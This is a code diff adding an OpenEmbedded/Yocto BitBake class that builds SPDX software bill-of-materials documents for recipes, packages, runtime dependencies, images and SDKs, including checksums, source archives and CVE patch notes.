+ for subdir, dirs, files in os.walk(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_dirs]
+ if subdir == str(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
+
+ for file in files:
+ filepath = Path(subdir) / file
+ filename = str(filepath.relative_to(topdir))
+
+ if not filepath.is_symlink() and filepath.is_file():
+ spdx_file = oe.spdx.SPDXFile()
+ spdx_file.SPDXID = get_spdxid(file_counter)
+ for t in get_types(filepath):
+ spdx_file.fileTypes.append(t)
+ spdx_file.fileName = filename
+
+ if archive is not None:
+ with filepath.open("rb") as f:
+ info = archive.gettarinfo(fileobj=f)
+ info.name = filename
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > source_date_epoch:
+ info.mtime = source_date_epoch
+
+ archive.addfile(info, f)
+
+ sha1 = bb.utils.sha1_file(filepath)
+ sha1s.append(sha1)
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA1",
+ checksumValue=sha1,
+ ))
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA256",
+ checksumValue=bb.utils.sha256_file(filepath),
+ ))
+
+ if "SOURCE" in spdx_file.fileTypes:
+ extracted_lics = extract_licenses(filepath)
+ if extracted_lics:
+ spdx_file.licenseInfoInFiles = extracted_lics
+
+ doc.files.append(spdx_file)
+ doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
+ spdx_pkg.hasFiles.append(spdx_file.SPDXID)
+
+ spdx_files.append(spdx_file)
+
+ file_counter += 1
+
+ sha1s.sort()
+ verifier = hashlib.sha1()
+ for v in sha1s:
+ verifier.update(v.encode("utf-8"))
+ spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
+
+ return spdx_files
+
+
+def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
+ from pathlib import Path
+ import hashlib
+ import oe.packagedata
+ import oe.spdx
+
+ debug_search_paths = [
+ Path(d.getVar('PKGD')),
+ Path(d.getVar('STAGING_DIR_TARGET')),
+ Path(d.getVar('STAGING_DIR_NATIVE')),
+ Path(d.getVar('STAGING_KERNEL_DIR')),
+ ]
+
+ pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
+
+ if pkg_data is None:
+ return
+
+ for file_path, file_data in pkg_data["files_info"].items():
+ if not "debugsrc" in file_data:
+ continue
+
+ for pkg_file in package_files:
+ if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
+ break
+ else:
+ bb.fatal("No package file found for %s" % str(file_path))
+ continue
+
+ for debugsrc in file_data["debugsrc"]:
+ ref_id = "NOASSERTION"
+ for search in debug_search_paths:
+ if debugsrc.startswith("/usr/src/kernel"):
+ debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
+ else:
+ debugsrc_path = search / debugsrc.lstrip("/")
+ if not debugsrc_path.exists():
+ continue
+
+ file_sha256 = bb.utils.sha256_file(debugsrc_path)
+
+ if file_sha256 in sources:
+ source_file = sources[file_sha256]
+
+ doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
+ if doc_ref is None:
+ doc_ref = oe.spdx.SPDXExternalDocumentRef()
+ doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
+ doc_ref.spdxDocument = source_file.doc.documentNamespace
+ doc_ref.checksum.algorithm = "SHA1"
+ doc_ref.checksum.checksumValue = source_file.doc_sha1
+ package_doc.externalDocumentRefs.append(doc_ref)
+
+ ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
+ else:
+ bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
+ break
+ else:
+ bb.debug(1, "Debug source %s not found" % debugsrc)
+
+ package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
+
+def collect_dep_recipes(d, doc, spdx_recipe):
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ dep_recipes = []
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if
+ dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
+ ))
+ for dep_pn in deps:
+ dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pn:
+ spdx_dep_recipe = pkg
+ break
+ else:
+ continue
+
+ dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
+
+ dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
+ dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_recipe_ref.checksum.algorithm = "SHA1"
+ dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
+
+ doc.externalDocumentRefs.append(dep_recipe_ref)
+
+ doc.add_relationship(
+ "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
+ "BUILD_DEPENDENCY_OF",
+ spdx_recipe
+ )
+
+ return dep_recipes
+
+collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
+collect_dep_recipes[vardeps] += "DEPENDS"
+
+def collect_dep_sources(d, dep_recipes):
+ import oe.sbom
+
+ sources = {}
+ for dep in dep_recipes:
+ # Don't collect sources from native recipes as they
+ # match non-native sources also.
+ if recipe_spdx_is_native(d, dep.recipe):
+ continue
+ recipe_files = set(dep.recipe.hasFiles)
+
+ for spdx_file in dep.doc.files:
+ if spdx_file.SPDXID not in recipe_files:
+ continue
+
+ if "SOURCE" in spdx_file.fileTypes:
+ for checksum in spdx_file.checksums:
+ if checksum.algorithm == "SHA256":
+ sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
+ break
+
+ return sources
+
+def add_download_packages(d, doc, recipe):
+ import os.path
+ from bb.fetch2 import decodeurl, CHECKSUM_LIST
+ import bb.process
+ import oe.spdx
+ import oe.sbom
+
+ for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
+ f = bb.fetch2.FetchData(src_uri, d)
+
+ for name in f.names:
+ package = oe.spdx.SPDXPackage()
+ package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
+ package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
+
+ if f.type == "file":
+ continue
+
+ uri = f.type
+ proto = getattr(f, "proto", None)
+ if proto is not None:
+ uri = uri + "+" + proto
+ uri = uri + "://" + f.host + f.path
+
+ if f.method.supports_srcrev():
+ uri = uri + "@" + f.revisions[name]
+
+ if f.method.supports_checksum(f):
+ for checksum_id in CHECKSUM_LIST:
+ if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
+ continue
+
+ expected_checksum = getattr(f, "%s_expected" % checksum_id)
+ if expected_checksum is None:
+ continue
+
+ c = oe.spdx.SPDXChecksum()
+ c.algorithm = checksum_id.upper()
+ c.checksumValue = expected_checksum
+ package.checksums.append(c)
+
+ package.downloadLocation = uri
+ doc.packages.append(package)
+ doc.add_relationship(doc, "DESCRIBES", package)
+ # In the future, we might be able to do more fancy dependencies,
+ # but this should be sufficient for now
+ doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
+
+python do_create_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import uuid
+ from pathlib import Path
+ from contextlib import contextmanager
+ import oe.cve_check
+
+ @contextmanager
+ def optional_tarfile(name, guard, mode="w"):
+ import tarfile
+ import gzip
+
+ if guard:
+ name.parent.mkdir(parents=True, exist_ok=True)
+ with gzip.open(name, mode=mode + "b") as f:
+ with tarfile.open(fileobj=f, mode=mode + "|") as tf:
+ yield tf
+ else:
+ yield None
+
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_workdir = Path(d.getVar("SPDXWORK"))
+ include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
+ archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
+ archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ doc = oe.spdx.SPDXDocument()
+
+ doc.name = "recipe-" + d.getVar("PN")
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ recipe = oe.spdx.SPDXPackage()
+ recipe.name = d.getVar("PN")
+ recipe.versionInfo = d.getVar("PV")
+ recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
+ recipe.supplier = d.getVar("SPDX_SUPPLIER")
+ if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
+ recipe.annotations.append(create_annotation(d, "isNative"))
+
+ homepage = d.getVar("HOMEPAGE")
+ if homepage:
+ recipe.homepage = homepage
+
+ license = d.getVar("LICENSE")
+ if license:
+ recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
+
+ summary = d.getVar("SUMMARY")
+ if summary:
+ recipe.summary = summary
+
+ description = d.getVar("DESCRIPTION")
+ if description:
+ recipe.description = description
+
+ if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
+ for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
+ recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
+
+ # Some CVEs may be patched during the build process without incrementing the version number,
+ # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
+ # save the CVEs fixed by patches to source information field in the SPDX.
+ patched_cves = oe.cve_check.get_patched_cves(d)
+ patched_cves = list(patched_cves)
+ patched_cves = ' '.join(patched_cves)
+ if patched_cves:
+ recipe.sourceInfo = "CVEs fixed: " + patched_cves
+
+ cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
+ if cpe_ids:
+ for cpe_id in cpe_ids:
+ cpe = oe.spdx.SPDXExternalReference()
+ cpe.referenceCategory = "SECURITY"
+ cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
+ cpe.referenceLocator = cpe_id
+ recipe.externalRefs.append(cpe)
+
+ doc.packages.append(recipe)
+ doc.add_relationship(doc, "DESCRIBES", recipe)
+
+ add_download_packages(d, doc, recipe)
+
+ if process_sources(d) and include_sources:
+ recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
+ with optional_tarfile(recipe_archive, archive_sources) as archive:
+ spdx_get_src(d)
+
+ add_package_files(
+ d,
+ doc,
+ recipe,
+ spdx_workdir,
+ lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
+ lambda filepath: ["SOURCE"],
+ ignore_dirs=[".git"],
+ ignore_top_level_dirs=["temp"],
+ archive=archive,
+ )
+
+ if archive is not None:
+ recipe.packageFileName = str(recipe_archive.name)
+
+ dep_recipes = collect_dep_recipes(d, doc, recipe)
+
+ doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
+ dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
+
+ recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
+ recipe_ref.spdxDocument = doc.documentNamespace
+ recipe_ref.checksum.algorithm = "SHA1"
+ recipe_ref.checksum.checksumValue = doc_sha1
+
+ sources = collect_dep_sources(d, dep_recipes)
+ found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
+
+ if not recipe_spdx_is_native(d, recipe):
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ if not oe.packagedata.packaged(package, d):
+ continue
+
+ package_doc = oe.spdx.SPDXDocument()
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ package_doc.name = pkg_name
+ package_doc.documentNamespace = get_doc_namespace(d, package_doc)
+ package_doc.creationInfo.created = creation_time
+ package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
+ package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ package_doc.creationInfo.creators.append("Person: N/A ()")
+ package_doc.externalDocumentRefs.append(recipe_ref)
+
+ package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
+
+ spdx_package = oe.spdx.SPDXPackage()
+
+ spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
+ spdx_package.name = pkg_name
+ spdx_package.versionInfo = d.getVar("PV")
+ spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
+ spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
+
+ package_doc.packages.append(spdx_package)
+
+ package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
+ package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
+
+ package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
+ with optional_tarfile(package_archive, archive_packaged) as archive:
+ package_files = add_package_files(
+ d,
+ package_doc,
+ spdx_package,
+ pkgdest / package,
+ lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
+ lambda filepath: ["BINARY"],
+ ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
+ archive=archive,
+ )
+
+ if archive is not None:
+ spdx_package.packageFileName = str(package_archive.name)
+
+ add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
+
+ oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
+}
+# NOTE: depending on do_unpack is a hack that is necessary to get it's dependencies for archive the source
+addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
+
+SSTATETASKS += "do_create_spdx"
+do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
+do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_spdx_setscene
+
+do_create_spdx[dirs] = "${SPDXWORK}"
+do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
+do_create_spdx[depends] += "${PATCHDEPENDENCY}"
+do_create_spdx[deptask] = "do_create_spdx"
+
+def collect_package_providers(d):
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+ import json
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ providers = {}
+
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
+ ))
+ deps.append(d.getVar("PN"))
+
+ for dep_pn in deps:
+ recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
+
+ for pkg in recipe_data.get("PACKAGES", "").split():
+
+ pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
+ rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
+ rprovides.add(pkg)
+
+ for r in rprovides:
+ providers[r] = pkg
+
+ return providers
+
+collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
+
+python do_create_runtime_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import oe.packagedata
+ from pathlib import Path
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
+ is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ providers = collect_package_providers(d)
+
+ if not is_native:
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ dep_package_cache = {}
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ localdata = bb.data.createCopy(d)
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ localdata.setVar("PKG", pkg_name)
+ localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
+
+ if not oe.packagedata.packaged(package, localdata):
+ continue
+
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
+
+ package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in package_doc.packages:
+ if p.name == pkg_name:
+ spdx_package = p
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
+
+ runtime_doc = oe.spdx.SPDXDocument()
+ runtime_doc.name = "runtime-" + pkg_name
+ runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
+ runtime_doc.creationInfo.created = creation_time
+ runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
+ runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ runtime_doc.creationInfo.creators.append("Person: N/A ()")
+
+ package_ref = oe.spdx.SPDXExternalDocumentRef()
+ package_ref.externalDocumentId = "DocumentRef-package-" + package
+ package_ref.spdxDocument = package_doc.documentNamespace
+ package_ref.checksum.algorithm = "SHA1"
+ package_ref.checksum.checksumValue = package_doc_sha1
+
+ runtime_doc.externalDocumentRefs.append(package_ref)
+
+ runtime_doc.add_relationship(
+ runtime_doc.SPDXID,
+ "AMENDS",
+ "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
+ )
+
+ deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
+ seen_deps = set()
+ for dep, _ in deps.items():
+ if dep in seen_deps:
+ continue
+
+ if dep not in providers:
+ continue
+
+ dep = providers[dep]
+
+ if not oe.packagedata.packaged(dep, localdata):
+ continue
+
+ dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
+ dep_pkg = dep_pkg_data["PKG"]
+
+ if dep in dep_package_cache:
+ (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
+ else:
+ dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pkg:
+ dep_spdx_package = pkg
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
+
+ dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
+ dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_package_ref.checksum.algorithm = "SHA1"
+ dep_package_ref.checksum.checksumValue = spdx_dep_sha1
+
+ dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
+
+ runtime_doc.externalDocumentRefs.append(dep_package_ref)
+
+ runtime_doc.add_relationship(
+ "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
+ "RUNTIME_DEPENDENCY_OF",
+ "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
+ )
+ seen_deps.add(dep)
+
+ oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
+}
+
+addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
+SSTATETASKS += "do_create_runtime_spdx"
+do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_runtime_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_runtime_spdx_setscene
+
+do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[rdeptask] = "do_create_spdx"
+
+def spdx_get_src(d):
+ """
+ save patched source of the recipe in SPDX_WORKDIR.
+ """
+ import shutil
+ spdx_workdir = d.getVar('SPDXWORK')
+ spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
+ pn = d.getVar('PN')
+
+ workdir = d.getVar("WORKDIR")
+
+ try:
+ # The kernel class functions require it to be on work-shared, so we dont change WORKDIR
+ if not is_work_shared_spdx(d):
+ # Change the WORKDIR to make do_unpack do_patch run in another dir.
+ d.setVar('WORKDIR', spdx_workdir)
+ # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+
+ # The changed 'WORKDIR' also caused 'B' changed, create dir 'B' for the
+ # possibly requiring of the following tasks (such as some recipes's
+ # do_patch required 'B' existed).
+ bb.utils.mkdirhier(d.getVar('B'))
+
+ bb.build.exec_func('do_unpack', d)
+ # Copy source of kernel to spdx_workdir
+ if is_work_shared_spdx(d):
+ share_src = d.getVar('WORKDIR')
+ d.setVar('WORKDIR', spdx_workdir)
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+ src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
+ bb.utils.mkdirhier(src_dir)
+ if bb.data.inherits_class('kernel',d):
+ share_src = d.getVar('STAGING_KERNEL_DIR')
+ cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
+ cmd_copy_shared_res = os.popen(cmd_copy_share).read()
+ bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
+
+ git_path = src_dir + "/.git"
+ if os.path.exists(git_path):
+ shutils.rmtree(git_path)
+
+ # Make sure gcc and kernel sources are patched only once
+ if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
+ bb.build.exec_func('do_patch', d)
+
+ # Some userland has no source.
+ if not os.path.exists( spdx_workdir ):
+ bb.utils.mkdirhier(spdx_workdir)
+ finally:
+ d.setVar("WORKDIR", workdir)
+
+do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
+
+ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
+
+do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
+POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
+POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
+
+python image_combine_spdx() {
+ import os
+ import oe.sbom
+ from pathlib import Path
+ from oe.rootfs import image_list_installed_packages
+
+ image_name = d.getVar("IMAGE_NAME")
+ image_link_name = d.getVar("IMAGE_LINK_NAME")
+ imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
+ img_spdxid = oe.sbom.get_image_spdxid(image_name)
+ packages = image_list_installed_packages(d)
+
+ combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
+
+ def make_image_link(target_path, suffix):
+ if image_link_name:
+ link = imgdeploydir / (image_link_name + suffix)
+ if link != target_path:
+ link.symlink_to(os.path.relpath(target_path, link.parent))
+
+ spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
+ make_image_link(spdx_tar_path, ".spdx.tar.gz")
+}
+
+python sdk_host_combine_spdx() {
+ sdk_combine_spdx(d, "host")
+}
+
+python sdk_target_combine_spdx() {
+ sdk_combine_spdx(d, "target")
+}
+
+def sdk_combine_spdx(d, sdk_type):
+ import oe.sbom
+ from pathlib import Path
+ from oe.sdk import sdk_list_installed_packages
+
+ sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
+ sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
+ sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
+ sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
+ combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
+
+def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
+ import os
+ import oe.spdx
+ import oe.sbom
+ import io
+ import json
+ from datetime import timezone, datetime
+ from pathlib import Path
+ import tarfile
+ import gzip
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+
+ doc = oe.spdx.SPDXDocument()
+ doc.name = rootfs_name
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ image = oe.spdx.SPDXPackage()
+ image.name = d.getVar("PN")
+ image.versionInfo = d.getVar("PV")
+ image.SPDXID = rootfs_spdxid
+ image.supplier = d.getVar("SPDX_SUPPLIER")
+
+ doc.packages.append(image)
+
+ for name in sorted(packages.keys()):
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
+ pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in pkg_doc.packages:
+ if p.name == name:
+ pkg_ref = oe.spdx.SPDXExternalDocumentRef()
+ pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
+ pkg_ref.spdxDocument = pkg_doc.documentNamespace
+ pkg_ref.checksum.algorithm = "SHA1"
+ pkg_ref.checksum.checksumValue = pkg_doc_sha1
+
+ doc.externalDocumentRefs.append(pkg_ref)
+ doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
+ break
+ else:
+ bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
+
+ runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
+ runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
+
+ runtime_ref = oe.spdx.SPDXExternalDocumentRef()
+ runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
+ runtime_ref.spdxDocument = runtime_doc.documentNamespace
+ runtime_ref.checksum.algorithm = "SHA1"
+ runtime_ref.checksum.checksumValue = runtime_doc_sha1
+
+ # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
+ doc.externalDocumentRefs.append(runtime_ref)
+ doc.add_relationship(
+ image,
+ "OTHER",
+ "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
+ comment="Runtime dependencies for %s" % name
+ )
+
+ image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
+
+ with image_spdx_path.open("wb") as f:
+ doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
+
+ num_threads = int(d.getVar("BB_NUMBER_THREADS"))
+
+ visited_docs = set()
+
+ index = {"documents": []}
+
+ spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
+ with gzip.open(spdx_tar_path, "w") as f:
+ with tarfile.open(fileobj=f, mode="w|") as tar:
+ def collect_spdx_document(path):
+ nonlocal tar
+ nonlocal deploy_dir_spdx
+ nonlocal source_date_epoch
+ nonlocal index
+
+ if path in visited_docs:
+ return
+
+ visited_docs.add(path)
+
+ with path.open("rb") as f:
+ doc, sha1 = oe.sbom.read_doc(f)
+ f.seek(0)
+
+ if doc.documentNamespace in visited_docs:
+ return
+
+ bb.note("Adding SPDX document %s" % path)
+ visited_docs.add(doc.documentNamespace)
+ info = tar.gettarinfo(fileobj=f)
+
+ info.name = doc.name + ".spdx.json"
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > int(source_date_epoch):
+ info.mtime = int(source_date_epoch)
+
+ tar.addfile(info, f)
+
+ index["documents"].append({
+ "filename": info.name,
+ "documentNamespace": doc.documentNamespace,
+ "sha1": sha1,
+ })
+
+ for ref in doc.externalDocumentRefs:
+ ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
+ collect_spdx_document(ref_path)
+
+ collect_spdx_document(image_spdx_path)
+
